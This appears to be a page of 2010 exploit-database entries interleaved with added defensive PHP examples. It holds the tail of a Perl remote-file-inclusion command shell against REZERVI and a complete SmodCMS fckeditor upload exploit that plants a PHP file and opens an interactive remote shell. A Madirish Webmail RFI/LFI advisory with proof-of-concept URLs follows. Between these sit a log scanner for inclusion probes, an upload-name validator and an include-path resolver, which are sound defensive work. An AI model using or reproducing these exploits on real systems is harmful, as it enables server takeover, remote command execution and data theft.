&banner unless ($vuln);
&banner unless ($shell);

&banner if $banner eq 1;

chomp($vuln);
chomp($shell);

while (){

print "[shell]:~\$ ";
chomp($cmd = <STDIN>);   # read one command from the interactive prompt

if ($cmd eq "exit" || $cmd eq "quit") {
exit 0;
}

my $ua = LWP::UserAgent->new;
$iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
chomp($iny);
my $own = $vuln . "/rezervi/include/mail.inc.php?root=" . $shell . $iny;
chomp($own);
my $req = HTTP::Request->new(GET => $own);
my $res = $ua->request($req);
my $con = $res->content;
if ($res->is_success){
print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix);
}
else
{
print "[p0c] Exploit failed\n";
exit(1);
}
}

# __E0F__
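The PoC URLs in the Moodle and REZERVI advisories above all carry a remote URL or a traversal string in an include-path parameter (`libdir=`, `dirroot=`, `root=`), which is easy to spot in web server logs. The following PHP CLI script is an added example, written for this page and not part of any of the advisories or the affected projects; it scans combined-format access log lines for that pattern. The log lines and the IP addresses in them are constructed for the example, and the list of watched parameter names is an assumption that should be extended for the application being monitored.

```php
<?php
// Added example (not from the original advisories): scan combined-format web
// server access log lines for RFI / LFI probes against the include parameters
// this page shows being abused (libdir, dirroot, basedir, root).
// The log lines below are constructed for this example.

$watched_params = ['libdir', 'dirroot', 'basedir', 'root'];

$sample_log = [
    '203.0.113.5 - - [07/May/2010:10:12:01 +0000] "GET /moodle/lib/textlib.class.php?libdir=http://198.51.100.9/s.txt? HTTP/1.0" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/May/2010:10:12:03 +0000] "GET /Madirish_Webmail/index.php?basedir=../../../outside/ HTTP/1.0" 200 77 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/May/2010:10:12:05 +0000] "GET /rezervi/include/mail.inc.php?root=http%3A%2F%2F198.51.100.9%2Fs.txt%3F&act=cmd HTTP/1.0" 200 640 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [07/May/2010:10:13:10 +0000] "GET /moodle/course/view.php?id=3 HTTP/1.1" 200 9123 "-" "Mozilla/5.0"',
];

/**
 * Return one finding per suspicious parameter found in a single log line
 * (an empty array when the request looks benign).
 */
function detect_inclusion_probe(string $line, array $watched_params): array
{
    // Pull the request target out of the quoted "METHOD target HTTP/x.y" field.
    if (!preg_match('/"(?:GET|POST|HEAD) ([^ "]+) HTTP\/[0-9.]+"/', $line, $m)) {
        return [];
    }
    $qpos = strpos($m[1], '?');
    if ($qpos === false) {
        return [];
    }
    // parse_str() URL-decodes values, so encoded and plain probes are treated alike.
    parse_str(substr($m[1], $qpos + 1), $params);

    $findings = [];
    foreach ($params as $name => $value) {
        if (!is_string($value) || !in_array(strtolower((string) $name), $watched_params, true)) {
            continue;
        }
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
            // A URL scheme in an include parameter: remote file inclusion attempt.
            $findings[] = ['param' => $name, 'type' => 'RFI', 'value' => $value];
        } elseif (preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $value) || strpos($value, "\0") !== false) {
            // A ".." segment or a NUL byte: local file inclusion / traversal attempt.
            $findings[] = ['param' => $name, 'type' => 'LFI', 'value' => $value];
        }
    }
    return $findings;
}

/** Run the detector over many lines and return human-readable alerts. */
function scan_log(array $lines, array $watched_params): array
{
    $alerts = [];
    foreach ($lines as $i => $line) {
        foreach (detect_inclusion_probe($line, $watched_params) as $f) {
            $alerts[] = sprintf('line %d: %s probe via %s=%s', $i + 1, $f['type'], $f['param'], $f['value']);
        }
    }
    return $alerts;
}

foreach (scan_log($sample_log, $watched_params) as $alert) {
    echo $alert, PHP_EOL;
}
```

Run with `php scan.php`; the first three constructed lines produce an alert each (two RFI, one LFI) and the fourth, a normal Moodle request, is silent. The decoding step matters: the REZERVI line is logged with the URL percent-encoded, and without `parse_str()` a plain `http://` substring match would miss it.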

2010/05/01

Google Chrome 4.1.249.1064 Remote Memory Corrupt (Local Crash Exploit)






2010/04/25

SmodCMS v.4.07 (fckeditor) Remote Arbitrary File Upload Exploit





/*
-----------------------------------------------------------------
SmodCMS v.4.07 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Developers: www.smod.pl
Download : http://smod.pl/pliki/smodcms407.zip
exploited by ..: eidelweiss
Special thanks to all my friends who helped and supported me when I was sick
details..: works with an Apache server with the mod_mime module installed (if specific)

[-] vulnerable code in path/fckeditor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = '/userfiles/' ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*] // What the user can do with this connector.
[*] $Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

With the default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code, because file names with multiple extensions are not properly checked.
*/

<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;

$connector = "/fckeditor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");

foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";

$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "\r\n";
$data .= "--abcdef--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");

$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);

if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;

sleep(1);
}

return false;
}
print "\n+-------------------------------------------------------------------------------+";
print "\n| SmodCMS v.4.07 (fckeditor) Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+-------------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /SmodCMS/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed You are not lucky...\n");
else print "\n[-] Shell uploaded in progress...!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\SmodCMS-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed You are not lucky...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
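The weakness the advisory describes is that the connector only looks at the last extension of the uploaded name, while Apache's mod_mime can select a handler from any extension in the name, so a file named like `0k.php.zip` can still be executed as PHP. The following validator is an added example written for this page; it is not FCKeditor's or SmodCMS's code. It applies the stricter rule that every dot-separated segment after the base name must be on the allowlist. The allowlist and the sample file names are constructed for the demonstration.

```php
<?php
// Added example (not code from FCKeditor or SmodCMS): validate an uploaded
// file name so that a multi-extension name such as "0k.php.zip" is rejected
// even though its last extension is allowed. Apache mod_mime can map a handler
// from ANY extension in the name, so checking only the last one is not enough.

/**
 * Decide whether $filename may be stored, given an allowlist of extensions.
 * Every dot-separated segment after the base name must be on the allowlist,
 * so "report.csv" passes while "0k.php.zip" and "shell.php" fail.
 * Returns the sanitised name to store on success, or null on rejection.
 */
function safe_upload_name(string $filename, array $allowed): ?string
{
    $allowed = array_map('strtolower', $allowed);

    // Strip any directory component a client may have sent.
    $name = basename(str_replace('\\', '/', $filename));

    // No empty or hidden names, no control characters, no overly long names.
    if ($name === '' || $name[0] === '.' || strlen($name) > 200
        || preg_match('/[\x00-\x1f\x7f]/', $name)) {
        return null;
    }

    $parts = explode('.', $name);
    if (count($parts) < 2) {
        return null;                       // an extension is required
    }
    $base = array_shift($parts);
    if ($base === '') {
        return null;
    }

    // Every remaining segment counts as an extension and must be allowed.
    foreach ($parts as $ext) {
        if ($ext === '' || !in_array(strtolower($ext), $allowed, true)) {
            return null;
        }
    }

    // Normalise: restrict the base name to [A-Za-z0-9_-] and keep one extension.
    $base = preg_replace('/[^A-Za-z0-9_-]/', '_', $base);
    return $base . '.' . strtolower(end($parts));
}

// Constructed sample names, including the case the advisory describes.
$allowed = ['zip', 'jpg', 'doc', 'csv', 'pdf'];
$samples = ['report.csv', 'photo.JPG', '0k.php.zip', 'shell.php',
            'a.php.jpg.zip', '../x.zip', 'archive.tar.gz', '.htaccess'];
foreach ($samples as $n) {
    $r = safe_upload_name($n, $allowed);
    printf("%-16s -> %s\n", $n, $r === null ? 'REJECTED' : 'stored as ' . $r);
}
```

With this rule `archive.tar.gz` is rejected unless `tar` is also allowlisted, which is the intended trade-off. The name check should be paired with a server-side control that the advisory's fix cannot provide on its own: serve the upload directory with script execution disabled (for Apache, for example a `php_flag engine off` or `RemoveHandler` directive scoped to that directory), so that even a misnamed file is never interpreted.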

Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability




=====================================================
Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability
=====================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Download: http://sourceforge.net/projects/madirishwebmail/files/madirish_webmail/2.01/Madirish_Webmail.tgz/download

Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
sp3x (securityreason) And All Friends.

Successful exploitation requires that "register_globals" is enabled.

========================================================================

Description:

Madirish Webmail is a PHP based email agent (with an Address Book and Calendar) primarily used to access a POP3 account via the web.
The system uses MySQL and PHP, and while developed for Linux, will probably work on other platforms.

========================================================================

-=[ VULN C0de ]=-

There is a vulnerability in almost every file of the directory tree; for example, in this file:

[-] Madirish_Webmail/lib/addressbook.php

*/
require_once($basedir."lib/sql.php");
require_once($basedir."lib/html.php");

*************************************************
[!] Another sample of vuln c0de, this one affected by LFI [!]
*************************************************

[-] Madirish_Webmail/index.php

*/
require_once ("inc/config.php"); //<= 1
require_once ($basedir."lib/html.php");
require_once ($basedir."lib/common.php"); //<=2
========================================================================

-=[ P0C RFI ]=-

http://127.0.0.1/Madirish_Webmail/lib/addressbook.php?basedir= [sh3ll inj3ct0r]

-=[ P0C LFI ]=-

http://127.0.0.1/Madirish_Webmail/index.php?basedir= [LFI]

etc, etc, etc

========================================================================

NB:
There is a vulnerability in almost every file of Madirish Webmail v2.01.
The vendor fixed the vulnerability in version 2.0 and updated to v2.0.1,
but the vendor did not fix the vulnerability completely: they only edited the code to handle remote file inclusion,
and as we see there is still an RFI vulnerability, and now I see a possible LFI there.

Solution: fix / edit the code, or update to a new version if available. Example:

*/
require_once($basedir."lib/sql.php"); // change into require_once("Madirish_Webmail/lib/sql.php");
require_once($basedir."lib/html.php"); // change into require_once("Madirish_Webmail/lib/html.php");
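Both the Moodle listing earlier on this page (`$CFG->libdir`, `$CFG->dirroot`) and the Madirish Webmail code above share one pattern: the base directory of a `require_once()` is a variable that a direct request can set while `register_globals` is on. The block below is an added example written for this page, not code from Moodle or Madirish Webmail and not the vendor's patch. It shows the anchored form of the include (base path fixed by `__DIR__`) and, for the cases where part of a path must still come from outside, a resolver that rejects URLs, traversal and NUL bytes and confirms the result stays under the base directory. The temporary files and the candidate paths are constructed for the demonstration.

```php
<?php
// Added example (not code from Moodle or Madirish Webmail): hardening the
// include pattern shown in both advisories, where the base directory of a
// require_once() came from a variable ($CFG->libdir, $CFG->dirroot, $basedir)
// that a direct request could set while register_globals was on.

// Drop-in replacement for the advisories' pattern:
//     require_once($basedir . "lib/sql.php");      // base path from a variable
// becomes
//     require_once(__DIR__ . '/lib/sql.php');      // base path fixed at compile time
// __DIR__ cannot be influenced by request data, so the RFI/LFI vector disappears.

/**
 * For the cases where part of the path still comes from outside (a module or
 * plugin name), resolve $relative under the fixed $base and return the real
 * path of an existing regular file inside $base, or null on any violation.
 * URLs, traversal and NUL bytes are rejected before the filesystem is consulted.
 */
function resolve_include(string $base, string $relative): ?string
{
    if ($relative === ''
        || strpos($relative, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.-]*://#i', $relative)          // remote URL
        || preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $relative)) {    // ".." segment
        return null;
    }
    $real_base = realpath($base);
    $real = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($real_base === false || $real === false || !is_file($real)) {
        return null;
    }
    // The resolved file must sit below the base directory (symlinks included).
    $prefix = rtrim($real_base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Demonstration on constructed files in a temporary directory.
$tmp = sys_get_temp_dir() . '/inc_demo_' . getmypid();
mkdir($tmp . '/lib', 0700, true);
file_put_contents($tmp . '/lib/sql.php', "<?php return 'lib/sql.php loaded';\n");

$candidates = ['lib/sql.php', '../../outside.php', 'http://198.51.100.9/s.txt',
               "lib/sql.php\0.txt", 'lib/missing.php'];
foreach ($candidates as $candidate) {
    $path = resolve_include($tmp, $candidate);
    $result = $path === null ? 'REJECTED' : (require $path);
    echo str_pad(addcslashes($candidate, "\0"), 28), ' => ', $result, PHP_EOL;
}

// Remove the demonstration files.
unlink($tmp . '/lib/sql.php');
rmdir($tmp . '/lib');
rmdir($tmp);
```

Only `lib/sql.php` is loaded; the other four candidates are rejected before any include happens. The configuration side of the same defence is `register_globals = Off` together with `allow_url_include = Off` (and, where nothing needs it, `allow_url_fopen = Off`) in php.ini, which removes the remote half of the vector for every script at once; the code-level check is still needed against the local half.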

=========================| -=[ E0F ]=- |=================================